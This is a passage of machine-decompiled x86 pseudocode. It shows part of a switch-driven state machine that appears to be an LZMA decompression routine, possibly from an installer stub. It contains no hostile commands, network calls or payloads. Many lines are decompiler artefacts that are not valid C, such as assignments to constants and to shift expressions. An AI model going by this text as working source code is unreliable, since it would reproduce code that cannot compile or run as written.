                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x28);
                                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        												__al = __al & 0x000000fd;
                                                                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												goto L69;
                                                                                                                        											}
                                                                                                                        											L67:
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											__ecx =  *(__ebp - 0x38);
                                                                                                                        											 *(__ebp - 0x84) = 8;
                                                                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        											goto L132;
                                                                                                                        										case 8:
                                                                                                                        											L70:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 0xa;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x38);
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        												 *(__ebp - 0x84) = 9;
                                                                                                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        											}
                                                                                                                        											goto L132;
                                                                                                                        										case 9:
                                                                                                                        											L73:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												goto L90;
                                                                                                                        											}
                                                                                                                        											L74:
                                                                                                                        											__eflags =  *(__ebp - 0x60);
                                                                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											L75:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        											__eflags = _t259;
                                                                                                                        											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                        											goto L76;
                                                                                                                        										case 0xa:
                                                                                                                        											L82:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												L84:
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        												goto L132;
                                                                                                                        											}
                                                                                                                        											L83:
                                                                                                                        											__eax =  *(__ebp - 0x28);
                                                                                                                        											goto L89;
                                                                                                                        										case 0xb:
                                                                                                                        											L85:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__ecx =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x20);
                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x28);
                                                                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        											L89:
                                                                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        											L90:
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        											goto L69;
                                                                                                                        										case 0xc:
                                                                                                                        											L99:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												L164:
                                                                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L100:
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t334 = __ebp - 0x70;
                                                                                                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t334;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                        											goto L101;
                                                                                                                        										case 0xd:
                                                                                                                        											L37:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												L159:
                                                                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L38:
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t122 = __ebp - 0x70;
                                                                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t122;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L39:
                                                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        												goto L48;
                                                                                                                        											}
                                                                                                                        											L40:
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												goto L54;
                                                                                                                        											}
                                                                                                                        											L41:
                                                                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        											 *(__ebp - 0x48) = __eax;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__eax = __eax << 8;
                                                                                                                        											__eax = __eax + __ebx;
                                                                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edx = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												 *(__ebp - 0x40) = 1;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												__ebx = __ebx + __ebx + 1;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edx;
                                                                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L39;
                                                                                                                        											} else {
                                                                                                                        												L45:
                                                                                                                        												goto L37;
                                                                                                                        											}
                                                                                                                        										case 0xe:
                                                                                                                        											L46:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												L160:
                                                                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L47:
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t156 = __ebp - 0x70;
                                                                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t156;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											while(1) {
                                                                                                                        												L48:
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L49:
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__edx = __ebx + __ebx;
                                                                                                                        												__ecx =  *(__ebp - 0x10);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													_t170 = __edx + 1; // 0x1
                                                                                                                        													__ebx = _t170;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													L53:
                                                                                                                        													goto L46;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L54:
                                                                                                                        											_t173 = __ebp - 0x34;
                                                                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        											__eflags =  *_t173;
                                                                                                                        											goto L55;
                                                                                                                        										case 0xf:
                                                                                                                        											L58:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												L161:
                                                                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L59:
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t203 = __ebp - 0x70;
                                                                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t203;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L60:
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												L55:
                                                                                                                        												__al =  *(__ebp - 0x44);
                                                                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        												goto L56;
                                                                                                                        											}
                                                                                                                        											L61:
                                                                                                                        											__eax =  *(__ebp - 0x58);
                                                                                                                        											__edx = __ebx + __ebx;
                                                                                                                        											__ecx =  *(__ebp - 0x10);
                                                                                                                        											__esi = __edx + __eax;
                                                                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edi = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												_t217 = __edx + 1; // 0x1
                                                                                                                        												__ebx = _t217;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edi;
                                                                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L60;
                                                                                                                        											} else {
                                                                                                                        												L65:
                                                                                                                        												goto L58;
                                                                                                                        											}
                                                                                                                        										case 0x10:
                                                                                                                        											L109:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												L165:
                                                                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L110:
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t365 = __ebp - 0x70;
                                                                                                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t365;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											goto L111;
                                                                                                                        										case 0x11:
                                                                                                                        											L69:
                                                                                                                        											__esi =  *(__ebp - 0x58);
                                                                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                                                                        											goto L132;
                                                                                                                        										case 0x12:
                                                                                                                        											L128:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												L131:
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												 *(__ebp - 0x84) = 0x13;
                                                                                                                        												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        												L132:
                                                                                                                        												 *(_t644 - 0x54) = _t642;
                                                                                                                        												goto L133;
                                                                                                                        											}
                                                                                                                        											L129:
                                                                                                                        											__eax =  *(__ebp - 0x4c);
                                                                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        											__eflags = __eax;
                                                                                                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        											goto L130;
                                                                                                                        										case 0x13:
                                                                                                                        											L141:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												L143:
                                                                                                                        												_t469 = __ebp - 0x58;
                                                                                                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        												__eflags =  *_t469;
                                                                                                                        												 *(__ebp - 0x30) = 0x10;
                                                                                                                        												 *(__ebp - 0x40) = 8;
                                                                                                                        												L144:
                                                                                                                        												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                        												L145:
                                                                                                                        												 *(_t644 - 0x50) = 1;
                                                                                                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                        												goto L149;
                                                                                                                        											}
                                                                                                                        											L142:
                                                                                                                        											__eax =  *(__ebp - 0x4c);
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        											 *(__ebp - 0x30) = 8;
                                                                                                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        											L130:
                                                                                                                        											 *(__ebp - 0x58) = __eax;
                                                                                                                        											 *(__ebp - 0x40) = 3;
                                                                                                                        											goto L144;
                                                                                                                        										case 0x14:
                                                                                                                        											L156:
                                                                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        											__eax =  *(__ebp - 0x80);
                                                                                                                        											while(1) {
                                                                                                                        												L140:
                                                                                                                        												 *(_t644 - 0x88) = _t537;
                                                                                                                        												goto L1;
                                                                                                                        											}
                                                                                                                        										case 0x15:
                                                                                                                        											L91:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        											__al = __al & 0x000000fd;
                                                                                                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											goto L120;
                                                                                                                        										case 0x16:
                                                                                                                        											goto L0;
                                                                                                                        										case 0x17:
                                                                                                                        											while(1) {
                                                                                                                        												L145:
                                                                                                                        												 *(_t644 - 0x50) = 1;
                                                                                                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                        												goto L149;
                                                                                                                        											}
                                                                                                                        										case 0x18:
                                                                                                                        											goto L146;
                                                                                                                        										case 0x19:
                                                                                                                        											L94:
                                                                                                                        											__eflags = __ebx - 4;
                                                                                                                        											if(__ebx < 4) {
                                                                                                                        												L98:
                                                                                                                        												 *(__ebp - 0x2c) = __ebx;
                                                                                                                        												L119:
                                                                                                                        												_t393 = __ebp - 0x2c;
                                                                                                                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        												__eflags =  *_t393;
                                                                                                                        												L120:
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax == 0) {
                                                                                                                        													L166:
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												L121:
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												L122:
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        												__eax =  *(__ebp - 0x30);
                                                                                                                        												_t400 = __ebp - 0x60;
                                                                                                                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        												__eflags =  *_t400;
                                                                                                                        												goto L123;
                                                                                                                        											}
                                                                                                                        											L95:
                                                                                                                        											__ecx = __ebx;
                                                                                                                        											__eax = __ebx;
                                                                                                                        											__ecx = __ebx >> 1;
                                                                                                                        											__eax = __ebx & 0x00000001;
                                                                                                                        											__ecx = (__ebx >> 1) - 1;
                                                                                                                        											__al = __al | 0x00000002;
                                                                                                                        											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        											__eflags = __ebx - 0xe;
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											if(__ebx >= 0xe) {
                                                                                                                        												L97:
                                                                                                                        												__ebx = 0;
                                                                                                                        												 *(__ebp - 0x48) = __ecx;
                                                                                                                        												L102:
                                                                                                                        												__eflags =  *(__ebp - 0x48);
                                                                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                                                                        													L107:
                                                                                                                        													__eax = __eax + __ebx;
                                                                                                                        													 *(__ebp - 0x40) = 4;
                                                                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													L108:
                                                                                                                        													__ebx = 0;
                                                                                                                        													 *(__ebp - 0x58) = __eax;
                                                                                                                        													 *(__ebp - 0x50) = 1;
                                                                                                                        													 *(__ebp - 0x44) = 0;
                                                                                                                        													 *(__ebp - 0x48) = 0;
                                                                                                                        													L112:
                                                                                                                        													__eax =  *(__ebp - 0x40);
                                                                                                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        														L118:
                                                                                                                        														_t391 = __ebp - 0x2c;
                                                                                                                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        														__eflags =  *_t391;
                                                                                                                        														goto L119;
                                                                                                                        													}
                                                                                                                        													L113:
                                                                                                                        													__eax =  *(__ebp - 0x50);
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													__esi = __edi + __eax;
                                                                                                                        													 *(__ebp - 0x54) = __esi;
                                                                                                                        													__ax =  *__esi;
                                                                                                                        													__ecx = __ax & 0x0000ffff;
                                                                                                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        														__ecx = 0;
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        														__ecx = 1;
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        														__ebx = 1;
                                                                                                                        														__ecx =  *(__ebp - 0x48);
                                                                                                                        														__ebx = 1 << __cl;
                                                                                                                        														__ecx = 1 << __cl;
                                                                                                                        														__ebx =  *(__ebp - 0x44);
                                                                                                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        														__cx = __ax;
                                                                                                                        														__cx = __ax >> 5;
                                                                                                                        														__eax = __eax - __ecx;
                                                                                                                        														__edi = __edi + 1;
                                                                                                                        														__eflags = __edi;
                                                                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                                                                        														 *__esi = __ax;
                                                                                                                        														 *(__ebp - 0x50) = __edi;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x10) = __edx;
                                                                                                                        														0x800 = 0x800 - __ecx;
                                                                                                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        														 *__esi = __dx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														L111:
                                                                                                                        														_t368 = __ebp - 0x48;
                                                                                                                        														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        														__eflags =  *_t368;
                                                                                                                        														goto L112;
                                                                                                                        													} else {
                                                                                                                        														L117:
                                                                                                                        														goto L109;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L103:
                                                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        													__ecx =  *(__ebp - 0x10);
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        													__ebx = __ebx | 0x00000001;
                                                                                                                        													__eflags = __ebx;
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													L101:
                                                                                                                        													_t338 = __ebp - 0x48;
                                                                                                                        													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        													__eflags =  *_t338;
                                                                                                                        													goto L102;
                                                                                                                        												} else {
                                                                                                                        													L106:
                                                                                                                        													goto L99;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L96:
                                                                                                                        											__edx =  *(__ebp - 4);
                                                                                                                        											__eax = __eax - __ebx;
                                                                                                                        											 *(__ebp - 0x40) = __ecx;
                                                                                                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        											goto L108;
                                                                                                                        										case 0x1a:
                                                                                                                        											L56:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                                                                        												L162:
                                                                                                                        												 *(__ebp - 0x88) = 0x1a;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L57:
                                                                                                                        											__ecx =  *(__ebp - 0x68);
                                                                                                                        											__al =  *(__ebp - 0x5c);
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        											 *( *(__ebp - 0x68)) = __al;
                                                                                                                        											__ecx =  *(__ebp - 0x14);
                                                                                                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        											__eax = __ecx + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t192;
                                                                                                                        											goto L80;
                                                                                                                        										case 0x1b:
                                                                                                                        											L76:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
